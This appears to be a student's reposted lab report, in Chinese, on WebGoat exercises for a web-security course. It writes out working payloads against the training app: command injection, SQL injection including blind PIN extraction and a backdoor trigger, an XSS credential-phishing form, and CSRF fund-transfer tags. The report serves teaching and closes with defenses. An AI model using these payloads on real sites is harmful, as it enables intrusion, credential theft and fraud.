2019-2020 20174318张致豪《网络对抗技术》Exp9 Web安全
Posted 20174318
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2019-2020 20174318张致豪《网络对抗技术》Exp9 Web安全相关的知识,希望对你有一定的参考价值。
Exp9 Web安全
前期准备
一、实验目标与基础知识
1.1 实践目标
- 做不少于7个关于SQL,XSS,CSRF的实验
1.2 基础知识
SQL注入
- 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串达到欺骗服务器执行恶意的SQL命令,即利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句;
- 输入的用户名\' or 1=1#中#相当于注释符,把后面的内容都注释掉,1=1是永真式,条件永远成立,和代码中select语句组合后变成select * from login5121_table where username=\'\' or 1=1# \' and password=\'\',不管密码是否输入正确,都能够成功登录。
XSS攻击
- 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中,比如这些代码包括html代码和客户端脚本,攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy),这种类型的漏洞由于被黑客用来编写危害性更大的phishing攻击而变得广为人知。
CSRF(Cross-site request forgery)
- CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性
实验步骤
一、WebGoat
-
下载webgoat:网站https://github.com/WebGoat/WebGoat/releases/tag/7.0.1,下载webgoat-container-7.0.1-war-exec.jar
- WebGoat默认使用8080端口,开启前先查看端口是否被占用: netstat -tupln | grep 8080
-
再有该文件的在命令行输入 java -jar webgoat-container-7.0.1-war-exec.jar 开启WebGoat
-
运行一段时间之后命令行出现Starting ProtocolHandler 证明开启成功
-
打开浏览器访问localhost:8080/WebGoat
-
WebGoat默登陆成功后发现左侧无选项:
-
如果左侧未出现课程则重新下载jdk,原因是编译后的java程序与Linux上的java Se版本不一致而产生的错误,解决方法如下:
-
下载jdk1-8
-
建立目录,将下载的jdk复制过去并解压
- 配置环境变量:
vim /etc/profile ,复制以下代码到文件结尾
JAVA_HOME=/usr/local/java/jdk1.8.0_161 PATH=$PATH:$HOME/bin:$JAVA_HOME/bin export JAVA_HOME export PATH
-
通知系统java的位置
-
设置默认JDK
-
重新载入profile
- 然后就能正常运行了
二、SQL注入攻击(Injection Flaws)
1.Command Injection(命令注入)
-
技术概念:命令注入攻击对任何一个以参数驱动的站点来说都是一个严重威胁。
-
原理:在正常的参数提交过程中,添加恶意的代码,往往能够得到以外的收获。
-
目标:能够在目标主机上执行任何系统命令
操作方法:
-
在左侧菜单栏中选择 Injection Flaws->Command Injection
-
右键点击复选框选择
Inspect Element
审查网页元素对源代码<option>
进行修改,在复选框中任意一栏的代码后添加"& netstat -an & ipconfig"
-
点击
View
可以看到网络端口使用情况和 IP 地址
2、Numeric SQL Injection(数字型SQL注入)
-
技术概念 :SQL 注入攻击对任何一个以数据库作为驱动的站点来说都是一个严重威胁
-
原理:在 station 字段中注入特征字符,能组合成新的 SQL 语句。
SELECT * FROM weather_data WHERE station = [station]
-
目标:查看所有的天气数据。
操作方法:
-
在左侧菜单栏中选择
Injection Flaws->Command Injection
-
右键点击复选框选择
Inspect Element
审查网页元素对源代码<option>
进行修改,在在选中的城市编号value="101"
后添加or 1=1
- 点击
Go!
显示所有天气数据
3、Log Spoofing(日志欺骗)
-
原理:这种攻击是在日志文件中愚弄人的眼睛,攻击者可以利用这种方式清除他们在日志中的痕迹
-
目标:灰色区域代表在 Web 服务器的日志中的记录的内容,我们的目的是使用户名为“admin”的用户在日志中显示“成功登录”
操作方法:
-
利用回车
0D%
和换行符%0A
让其在日志中两行显示 -
在User Name中填入
webgoat%0d%0aLogin Succeeded for username: zzh20174318
-
点击Login可以看到
webgoat Login Fail
,自己添加的zzh20174318 Login Succeeded
4、String SQL Injection(字符串型注入)
- 目标 基于查询语句构造自己的SQL注入字符串,显示所有信用卡信息
操作方法:
- 使用
\'
提前闭合""
,插入永真式1=1
,--
注释掉后面的内容 - 输入查询的用户名
yb\' or 1=1--
select表里面的所有数据
5、LAB: SQL Injection
- 目标:使用 SQL 注入绕过认证
操作方法:
- 右键点击页面,选择
inspect Element
审查网页元素对源代码进行修改,将password
密码框的最大长度限制改为20
- 以用户Neville登录,输入密码
hj\' or \'1\' = \'1,
攻击成功,得到所有人员列表
6、Database Backdoors(数据库后门)
- 主题:如何创建数据库后门
- 原理:数据库通常作为一个 Web 应用程序的后端来使用。此外,它也用来作为存储的媒介。 它也可以被用来作为存储恶意活动的地方,如触发器。触发器是在数据库管理系统上调用另 一个数据库操作,如 insert, select, update or delete。举个例子:攻击者可以创建一个触发器, 该触发器在创建新用户时,将每个新用户的 Email 地址设置为攻击者的地址。
- 目标:我们的目标是学习如何利用查询的脆弱性创建触发器。由于 WebGoat 使用的是 mysql 数据库,不支持触发器,所以该课程不会真正完成。 我们的 Login ID 是 101。
操作方法:
- 输入101,得到该用户的信息
-
输入注入语句
101; update employee set salary=8000
执行两个语句
-
输入
101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=\'chaowendao@outlook.com\'WHERE userid = NEW.userid
注入一个充当SQL后门的触发器
-
分析:
-
BEFORE/AFTER
参数指定了触发执行的时间,在事件之前或是之后 -
FOR EACH ROW
表示任何一条记录上的操作满足触发事件都会触发该触发器,也就是说触发器的触发频率是针对每一行数据触发一次
-
7、Blind Numeric SQL Injection(数字型盲注入)
-
原理:某些 SQL 注入是没有明确返回信息的,只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句,构造子查询语。
-
目标:下面的表单允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或假)测试检查数据库中其它条目信息。
操作方法:
-
本实验中,服务端页面返回的信息只有两种:帐号有效或无效。因此无法简单地查询到帐号的PIN数值。尽管如此,我们可以利用系统后台在用的查询语句
SELECT * FROM user_data WHERE userid=accountNumber;
-
如果该查询语句返回了帐号的信息,页面将提示帐号有效,否则提示无效。使用
AND
函数,我们可以添加一些额外的查询条件。如果该查询条件同样为真,则返回结果应提示帐号有效,否则无效。 -
输入查询语句
101 AND 1=1
,因为两个条件都成立,所以页面返回帐号有效
-
输入查询语句
101 AND 1=2
,因为第二个条件不成立,所以而页面返回帐号无效
-
针对查询语句的后半部分构造复杂语句
101 AND ((SELECT pin FROM pins WHERE cc_number=\'1111222233334444\') > 10000 );
-
如果页面提示帐号有效,说明PIN>10000,否则PIN<=10000;不断调整数值,可以利用二分法,最终判断出PIN数值的大小为2364
8、Blind String SQL Injection(字符串型盲注入)
- 目标:下面的表单允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或 假)测试检查数据库中其它条目信息。
我们的目标是找到 pins 表中 cc_number 字段值为 4321432143214321 的记录中 pin 字段的数值。pin 字段类型为 varchar。输入找到的数值(最终的字符串,注意拼写和大写)并提交,通过本课程。
操作方法:
- 本节内容与上一节很类似,最大的不同是要查询的字段是一个字符串而不是数值
- 输入
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=\'4321432143214321\'), 1, 1) < \'H\' );
取得 pin 字段数值的第一个字母,并判断其是否比字 母“H”小
-
经过多次测试比较0-9、A-Z、a-z等字符串和页面的返回数据,判断出第一个字符为J,同理继续判断第二个字符,输入
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=\'4321432143214321\'), 2, 1) < \'h\' );
-
最终的都正确PIN字段Jill输入验证
三、XSS攻击
1、Phishing with XSS 跨站脚本钓鱼攻击
- 技术概念:在服务端对所有输入进行验证总是不错的做法。当用户输入非法 HTTP 响应时容易造成 XSS。在 XSS 的帮助下,您可以实现钓鱼工具或向某些官方页面中增加内容。对于受害者来说很难发现该内容是否存在威胁。
- 原理:如果有权限操作页面源代码,那么 HTML 文档的内容是可以被篡改的。
- 目标:创建一个 form,要求填写用户名和密码。将数据提交到黑客服务器
- 在搜索框输入如下代码,页面增加一个表单
<head> <body> <div> <div style="float:left;height:100px;width:50%;"></div> <div style="float:left;height:100px;width:50%;"></div> </div> <div style="height:200px;clear:both;"></div> </div></div> </form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script> <form name="phish"> <br> <br> <HR> <H2>This feature requires account login:</H2> <br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"> <br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR> </body> </head>
- 输入用户名和密码,读取在表单上输入的用户名和密码信息并发送给捕获这些信息的WebGoat
2、存储型XSS攻击(Stored XSS Attacks)
- 原理: 这种攻击常见于论坛等留言平台,用户留言的时候输入一段javascript脚本,这段脚本就会被保存在数据库中。因为是留言,所以任何用户在打开网页的时候,这个脚本就会被从数据库中取出来而运行。
- 目标:创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容
操作方法:
- 在title中任意输入字符,留言板中输入
<script>alert("You\'ve been attacked!az az az az az az az");</script>
后点击Submit
攻击成功
3、反射型XSS攻击(Reflected XSS Attacks)
- 技术概念:在反射的XSS攻击中,攻击者可以使用攻击脚本创建一个URL,并将其发布到另一个网站、通过电子邮件或其他方式让受害者点击它。
- 目标:通过使用攻击脚本创建一个URL,并将其发布到另一个网站,通过电子邮件引诱用户点击实现攻击
操作方法:
- 输入代码
<script>alert("You\'ve been attacked!!azazazazaz");</script>
,点击purchase
的同时页面就给出了反馈
- 这里火狐浏览器弹没有弹出警告框
四、CSRF攻击
1、跨站请求伪造(Cross Site Request Forgery (CSRF))
- 原理:跨站请求伪造是一种让受害者加载一个包含网页的图片的一种攻击手段。如下代码所示:
<imgsrc="https://www.mybank.com/me?transferFunds=5000&to=123456"/>
- 当受害者的浏览器试图呈现此页面时,它将使用指定的参数向www.mybank.com的“me”端点发出请求。浏览器将请求链接以获得图像,即使它实际上是一个资金转移功能。提交请求时,浏览器将添加与站点相关的所有cookie。因此,如果用户对站点进行了身份验证,并且拥有永久或当前会话cookie,那么站点将无法将其与合法的用户请求区分开来。通过这种方式,攻击者可以让受害者执行他们不打算执行的操作,比如“购买物品”,或者脆弱网站提供的任何其他功能。
操作方法:
- 查看页面右侧Parameters中的src和menu值,分别为324和900
-
在title中输入任何参数,message框中输入
<img src="http://localhost:8080/WebGoat/attack?Screen=324&menu=900&transferFunds=5000" width="1" height="1" />
,以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件,点击Submit提交- 宽高设置成1像素的目的是隐藏该图片
-
在Message List中生成以Title命名的链接(消息)。点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5000元,从而达到CSRF攻击的目的。
2、绕过 CSRF 确认( CSRF Prompt By‐Pass)
-
主题:实现跨站请求伪造攻击(CSRF),包括通过多个请求绕过用户确认脚本命令
-
原理:跨站点请求伪造(CSRF/XSRF)是一种攻击,它欺骗受害者加载包含“伪造请求”的页面,以便使用受害者的凭据执行命令。提示用户确认或取消命令可能听起来像一个解决方案,但如果提示符是可编写脚本的,则可以忽略它。本课展示如何通过发出另一个伪造的请求来绕过这样的提示符。这也适用于一系列提示,例如向导或发出多个不相关的伪造请求。
操作方法:
- 查看页面右侧Parameters中的src和menu值分别为326和900
- 并在title框中输入学号,message框中输入代码:
<iframe src="attack?Screen=326&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=326&menu=900&transferFunds=CONFIRM"> </iframe>
-
在Message List中生成以Title命名的链接,点击进入后,攻击成功
实验总结
一、基础问题回答
(1)SQL注入攻击原理,如何防御
『 SQL注入攻击是把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,来达到欺骗服务器执行恶意SQL命令的目的。
防御方式:
- 使用参数化筛选语句 “--”、“\'” 等等
- 注入关键字的过滤 例如用正则表达式
- 区分权限 普通用户与系统管理员用户的权限要有严格的区分
- 数据库加密 使用一些安全参数 』
(2)XSS攻击的原理,如何防御
『 XSS攻击是利用网页开发时留下的漏洞,将恶意代码植入网页,使用户加载并执行攻击者恶意制造的网页程序。攻击成功后,可以进行越权操作、获取私密网页内容、会话和cookie等各种内容
防御方式:
- 提前对需要的参数进行过滤检测
- 对输入框做长度限制
- 在后台对数据进行过滤
- 消除网站的XSS漏洞,需要网站开发者运用转义安全字符等手段。』
(3)CSRF攻击原理,如何防御
『 CSRF攻击是通过伪装成受信任的用户,利用他们的请求来访问攻击受信任的网站
防御方式:
- 设置浏览器不记住用户账号密码
- 添加随机验证 每一个重要的post提交页面,使用一个验证码
- 网页账号定时注销 规避一个账号使用到底』
二、实验总结与体会
本次实验通过WebGoat学习了SQL、XSS、CRSF相关的知识,了解了关于它们的多种攻击方式,实验做完后就感觉上网被攻击的风险挺大的,平时更是需要注意保护个人的信息。
本次实验做完后终于不用写博客了。通过一系列的学习,本学习对网络攻防有了进一步的理解与掌握,本来对这门学科是没有什么主观上的看法的,好多的东西之前都没有接触过,在各个实验与课堂里,慢慢接触后发现这门课是非常有趣的,那些看似复杂的语句、看似晦涩的知识,实际上都很好理解。虽然实验做完了,但学习并没有结束,也希望在日后能用到本学期实验中的相关知识理论与技术手段。
以上是关于2019-2020 20174318张致豪《网络对抗技术》Exp9 Web安全的主要内容,如果未能解决你的问题,请参考以下文章
20199318 2019-2020-2 《网络攻防实践》综合实践
2019-2020-1学期20192423《网络空间安全专业导论》第十周学习总结
2019-2020-1学期20192412《网络空间安全专业导论》第八周学习总结
2019-2020-2 网络对抗技术 20175213吕正宏 Exp4 恶意代码分析